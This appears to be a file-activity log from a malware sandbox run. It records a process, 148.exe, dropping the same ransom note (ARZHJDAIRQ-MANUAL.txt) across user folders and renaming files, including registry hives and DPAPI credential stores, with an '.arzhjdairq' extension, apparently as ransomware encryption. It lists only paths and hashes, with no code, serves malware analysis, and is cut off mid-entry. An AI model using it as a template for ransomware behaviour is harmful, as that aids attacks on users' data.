MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.arzhjdairq
binary
MD5: 42e26c48e26ec19c024062e52ecae876
SHA256: 79b4bcec550854636af4dbb350b4dd5e5290518ce91cf73b3f01925342288a0f
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.arzhjdairq
binary
MD5: a9379a5fa2fc3ffee7cb9fa8b2206f77
SHA256: 3140a9a736d1be9565b9998ea99eea9066119f50241277e6d1e01e33fb821c03
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.arzhjdairq
binary
MD5: ba23ead30c688e5bf5bb7bbe5326808f
SHA256: 108a068a74dd40ed137f0d4c1288220f4d14fcc3b1144b4ed08f5d31baa464d8
3332
148.exe
C:\Users\Default\NTUSER.DAT.LOG1.arzhjdairq
binary
MD5: 96d8519093e532d6087275f3c54598f3
SHA256: 67973a28fe6bffa78a3b13e177f289a2d3bc86f22f4a744b8fd01ad2e16288d3
3332
148.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Default\NTUSER.DAT.LOG1
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Default\Links\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Favorites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Pictures\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Videos\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Desktop\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Music\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Documents\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Downloads\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Local\Microsoft\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Media Center Programs\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Local\Temp\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\History\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Searches\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Local\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Saved Games\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\ntuser.ini.arzhjdairq
binary
MD5: 1ad0e49adc627c20785da28c934ca5f8
SHA256: dc5c9585809636878d6dca7a5d909be72b20edf1a82b41071606968d98e1ff19
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\ntuser.ini
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.arzhjdairq
binary
MD5: e2f6545fa1fa7b0cc407bc07a55ae3d3
SHA256: 48ef6536279e087ec9db7cafbbb3dd54fa1f65990d310c0c679767c984094522
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.arzhjdairq
binary
MD5: 2c6af34285f3755d4b2dbcb3e7275744
SHA256: 4dccb387d5c587982598495b16fe2f4a5aef932e4d0af7b6704277f187458305
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\ntuser.dat.LOG1.arzhjdairq
binary
MD5: f5b2bbd44e60e4f3029e03d02f0495f0
SHA256: 78316e38502452901882de37d7aa39d30899c8867bf742e45d68d632bf6b5cdf
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.arzhjdairq
binary
MD5: 19471bf73685d6de21dd466a16c6f64a
SHA256: 6cb4beea43a2c55926adffbde4072782af0829c4a556790642fd8bab50a8ab8b
3332
148.exe
C:\Users\Administrator\ntuser.dat.LOG1
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Links\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url.arzhjdairq
binary
MD5: b30eba0c6616f760368f2c06561f059b
SHA256: 8d21194efc8045442aae1502259ed2d5fecf22b571db3d3f8dbd123c655d55fa
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url.arzhjdairq
binary
MD5: d6702481675ced9d836a7f9fdfa0ca4a
SHA256: 78c581b354d772b97911fde59bdb39b5c951644e1072d1abf39040fe08039d05
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url.arzhjdairq
binary
MD5: 159cfa0d876044f7b96d8f57d9c8e601
SHA256: ca658df45025fa4ea6b020a94319153f1682ee73449a0583c57b49ff0c49691a
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url.arzhjdairq
binary
MD5: 1f132c3b25155ee58a742f8c7bf12e2c
SHA256: 6f98318d52908cfa74f815387cdb5d112ed5a6c8d3c17098be6ea82969d6a415
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Windows Live\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url.arzhjdairq
binary
MD5: bccc0ac0581d47660fb5bec4dbc6c343
SHA256: f17cdb5a9e722f66549f93de996a3ee2be3f4c1d2ce45db1994c05e596b905c0
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url.arzhjdairq
binary
MD5: 5b952d98818bd79523722f6f90686437
SHA256: 76b6df28262d63fc7cce93c5bea62b35cbf11ba5e90935f771f3008f797fb9db
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url.arzhjdairq
binary
MD5: 628c611cf67c60f3d9f48daa9fec9564
SHA256: 253c3a3c00c99582450560b7938228fc27e32dc627fccaebce8a695108d4f61e
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url.arzhjdairq
binary
MD5: e37df9a5d492805522f0f450e3289455
SHA256: 57f0ed655dc5c32b96588605bb669385c7e0717bfa9832160b3dab21999aeb5d
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url.arzhjdairq
binary
MD5: 1ebbdeccb732bfeb70d81f3f27b4f6a4
SHA256: a43726d0e6e9635de1a612498c90c5dfff99a051af34eb9d0cc7de1c8ffdf0f2
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url.arzhjdairq
binary
MD5: c6b0fa1b9b0ad502a697b111ae20df28
SHA256: 0285b14556e31f4e932d7f3d141445a7db515018673cefdf8727eec3c7d86138
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url.arzhjdairq
binary
MD5: 0806892e90a4a29c19199d1b613e2eeb
SHA256: 358619439d59925b2e0f54330dccef25bf14ef73b68b7ecac4c0193da40fdbc8
3332
148.exe
C:\Users\Administrator\Favorites\MSN Websites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url.arzhjdairq
binary
MD5: b584079cba8929c90fe1e4c50b9a30f3
SHA256: 53eacaed272d0714ea0842894f8d99ba64f89d32b2756c146f50382081b48fbe
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url.arzhjdairq
binary
MD5: 551ff63b452dd355563f8553068ead08
SHA256: 71e3b4752a002fff50111548ee3eaa01784c1d8d49ba7612dada1053ace53cfc
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url.arzhjdairq
binary
MD5: 2700dd1af412a7edf22b79abd0f22be4
SHA256: 0e118da27e88adb473f9ec1dd5a35cf1278c8398785c6f7ab59ab9483e33dbe4
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url.arzhjdairq
binary
MD5: 0e4e4b519b30b13c5957aa2b7354ae92
SHA256: 89608bafd2e4a6bb5492f20e5437f2afcaf037499f0cfebaa797df762b464823
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Microsoft Websites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url.arzhjdairq
binary
MD5: 87cc0cbef6c2af32a5c4ed232eaca159
SHA256: 7e77883ef698b6a81ae7d03d14ff88985921a6d8717a4ec52c3d692cf4394c2f
3332
148.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url.arzhjdairq
binary
MD5: 3e6d733f1d70f1a6c66a2fea5811a544
SHA256: b6d22d80441626e966fd0086484f1cf05db64c57a6b28e61eb8d146357feb498
3332
148.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Favorites\Links for United States\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url.arzhjdairq
binary
MD5: 23fb3c238469ecc5898c04d314ceb489
SHA256: b0bc9c27c2140abe49de5c105904bcc9383f54c5d817c2ea4bd631db7a818ae3
3332
148.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Downloads\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Favorites\Links\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Videos\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Pictures\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Documents\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Music\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Contacts\Administrator.contact.arzhjdairq
bs
MD5: 69f594741a018a038d411034e9ef7a99
SHA256: 0c575706a111c052cf3f52ea77d99c28ee6db3d331b9ec955ebd4f712529450e
3332
148.exe
C:\Users\Administrator\Desktop\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\Contacts\Administrator.contact
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\Contacts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred.arzhjdairq
binary
MD5: 5932adf8d8a46502eb810d0816a4e5c1
SHA256: af574b774ad5d50d248b38e0ffe0dd63143447913a6125d90795e02d97eec720
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156.arzhjdairq
binary
MD5: e15fa21832138f1595ed6d58f841f29e
SHA256: 55e22311bb22864ceebbbce9084ebdb84cb5236fd7ec2b09715108d142394c25
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST.arzhjdairq
binary
MD5: 389baca03f41b18afeaa1221def17fb0
SHA256: f769aec0715c37c661bbd2764789cab000ff02301c33de73fe21d12e377895f4
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\LocalLow\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Identities\{BA2162A3-2F32-4850-8D8C-B3C9A2AA9D43}\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Media Center Programs\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\WPDNSE\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log.arzhjdairq
binary
MD5: 7a9398959c4e5d61d0b4a69eafee0542
SHA256: 1a22ff4823030fcc046b6886ab254ff1335a4c96d2c3073842ca6d9634a3921d
3332
148.exe
C:\Users\Administrator\AppData\Roaming\Identities\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\Low\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp.arzhjdairq
binary
MD5: c46c423ef0c53153c9862c9e8194fc2f
SHA256: ffe9635fb368e870a98464bc17ba4f7336370c2be9f6ff82e00e586a47a8929c
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.arzhjdairq
binary
